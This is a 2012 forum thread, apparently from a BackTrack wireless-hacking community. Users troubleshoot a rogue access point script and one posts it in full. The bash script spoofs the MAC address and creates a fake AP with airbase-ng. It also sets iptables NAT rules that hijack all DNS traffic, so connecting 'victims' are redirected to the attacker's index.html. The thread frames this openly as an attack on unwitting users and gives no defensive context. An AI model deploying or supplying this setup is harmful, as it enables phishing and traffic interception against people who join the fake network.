Yeah you can contact me on aim
But like VulpiArgenti said there was a fault in my index.html
I updated the script. Download it again and it should work.
I can't realy help you with the alfa card.
Lhyx1 I know your a busy man but could I contact you on aim
Yeah you can contact me on aim
But like VulpiArgenti said there was a fault in my index.html
I updated the script. Download it again and it should work.
I can't realy help you with the alfa card.
Last edited by LHYX1; 01-07-2012 at 01:47 PM.
(\ /)
( . .)
c(")(")
This is bunny.
Copy and paste bunny into your signature to help him gain world domination.
i'm still having dhcpd3 ip issuing to clients issues with the alfa awus036h if anyone can help that would be awesome. I am also using a vmware copy of backtrack.
I have absolutely no idea what might be causing this. Almost everybody uses the awus036h and nobody else is having troubles with it.
The only advice I can give you is to try some different victim machines. Try with a smartphone or another laptop. Maybe a smartphone does get an ip ?
And try running the script from a fresh copy of backtrack. Maybe you changed something that causes these problems ? Or try reinstalling the dhcp3 server ?
You can also search for other soft AP scripts and see if those work ? You can find a lot of scripts that do something similar on this forum.
There is not much else I can tell you.
(\ /)
( . .)
c(")(")
This is bunny.
Copy and paste bunny into your signature to help him gain world domination.
Hi i just wanted to know if a victim connects to my rogue ap and tries to go to a web site (google.com for example) is he going to be
redirected to index.html or not ????
if not please give me a way to do it
thanks![]()
here is the script i used for creating fake ap
#!/bin/bash
/etc/init.d/networking restart
rmmod rtl8187
rfkill block all
rfkill unblock all
modprobe rtl8187
rfkill unblock all
ifconfig wlan0 up
ifconfig wlan0 down
macchanger -a wlan0
aireplay-ng -9 wlan0
airmon-ng start wlan0 11
#The next step is to properly configure the DHCP server (dhcpd). You should edit the following configuration file:
#/etc/dhcp3/dhcpd.conf
konsole -e airbase-ng -e gggggggggg -c 11 mon0 &
sleep 12
ifconfig at0 up
ifconfig at0 10.0.0.1/24
ifconfig at0 mtu 1400
route add -net 10.0.0.0/24 gw 10.0.0.1
iptables --flush
iptables --delete-chain
iptables -t nat --flush
iptables -t nat --delete-chain
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1
iptables -A FORWARD -i at0 -j ACCEPT
echo "1" > /proc/sys/net/ipv4/ip_forward
echo > '/var/lib/dhcp3/dhcpd.leases'
@sirano
Yes, every website will be redirected to index.html
(\ /)
( . .)
c(")(")
This is bunny.
Copy and paste bunny into your signature to help him gain world domination.
Thank you very much !